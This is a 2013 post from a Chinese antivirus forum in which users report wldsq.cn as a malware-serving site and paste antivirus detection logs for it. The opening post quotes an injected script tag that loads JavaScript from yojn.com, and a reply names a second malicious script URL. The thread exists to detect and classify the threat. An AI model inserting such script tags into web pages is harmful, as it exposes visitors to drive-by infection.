收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://www.wldsq.cn/
返回列表 发新帖
查看: 1143|回复: 6
收起左侧

[已鉴定] http://www.wldsq.cn/

 关闭 [复制链接]
墨家小子
发表于 2013-4-17 12:42:13 | 显示全部楼层 |阅读模式
本帖最后由 wjhstu-VxG 于 2013-4-17 19:56 编辑
  1. <script src='http://yojn.com/uuu.js?id=882668&web_id=882668' language='JavaScript' type=
  2. 'text/JavaScript' charset='gb2312'></script>
复制代码

评分

参与人数 1经验 +10 收起 理由
蓝核 + 10 感谢解答: )

查看全部评分

回复

举报

哀酱俏佳人
发表于 2013-4-17 12:48:57 | 显示全部楼层
http://web.nba1001.net:8888/tj/tongji.js


还有这个无法解析
回复

举报

蓝核
发表于 2013-4-17 13:34:13 | 显示全部楼层
哀酱俏佳人 发表于 2013-4-17 12:48

直接算恶意好了~~~~
回复

举报

哀酱俏佳人
发表于 2013-4-17 17:16:45 | 显示全部楼层
蓝核 发表于 2013-4-17 13:34
直接算恶意好了~~~~

这个js很多挂马都有
回复

举报

蓝核
发表于 2013-4-17 17:24:58 | 显示全部楼层
哀酱俏佳人 发表于 2013-4-17 17:16
这个js很多挂马都有

所以好认~~~
回复

举报

wjcharles
发表于 2013-4-17 18:19:12 | 显示全部楼层
文件名: wldsq_cn[1].htm
威胁名称: W32.Fujacks.CE!html
完整路径: c:\users\sshss\appdata\local\microsoft\windows\temporary internet files\content.ie5\orkhs60f\wldsq_cn[1].htm

____________________________

详细信息
未知的社区使用情况,  未知的文件存在时间,  风险 高

原始
下载自 未知

活动
已执行的操作: 已执行的操作: 1

____________________________


在电脑上的创建时间 2013/4/17 ( 18:16:15 )
上次使用时间 2013/4/17 ( 18:18:16 )
启动项目 否
已启动 否

____________________________


未知
诺顿社区中使用了此文件的用户数未知。

未知
此文件版本当前未知。


此文件具有高风险。

威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。



____________________________



来源: 外部介质
源文件:
wldsq_cn[1].htm

____________________________

文件操作

文件: c:\Users\ssHss\AppData\Local\microsoft\Windows\temporary internet files\Content.IE5\ORKHS60F\wldsq_cn[1].htm已删除
____________________________


文件指纹 - SHA:
d51cccc8bbf2f3d9929fc798e595d10424494d93b9f9a50c8bc6521969a467d1
文件指纹 - MD5:
不可用
















文件名: newguest[1].htm
威胁名称: W32.Fujacks.CE!html
完整路径: c:\users\sshss\appdata\local\microsoft\windows\temporary internet files\content.ie5\hvavhav8\newguest[1].htm

____________________________

详细信息
未知的社区使用情况,  未知的文件存在时间,  风险 高

原始
下载自 未知

活动
已执行的操作: 已执行的操作: 1

____________________________


在电脑上的创建时间 2013/4/17 ( 18:16:17 )
上次使用时间 2013/4/17 ( 18:18:18 )
启动项目 否
已启动 否

____________________________


未知
诺顿社区中使用了此文件的用户数未知。

未知
此文件版本当前未知。


此文件具有高风险。

威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。



____________________________



来源: 外部介质
源文件:
newguest[1].htm

____________________________

文件操作

文件: c:\Users\ssHss\AppData\Local\microsoft\Windows\temporary internet files\Content.IE5\HVAVHAV8\newguest[1].htm已删除
____________________________


文件指纹 - SHA:
d46b7741fd6ef63bef463f64f99672557714d693144e9225376d5daa3698cd58
文件指纹 - MD5:
不可用
回复

举报

fireold
发表于 2013-4-17 18:20:02 | 显示全部楼层
The file was deleted.

File: C:\Users\abc\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000128
Virus: Win32.Jadtre.B (Engine A)
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 18:48 , Processed in 0.128413 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表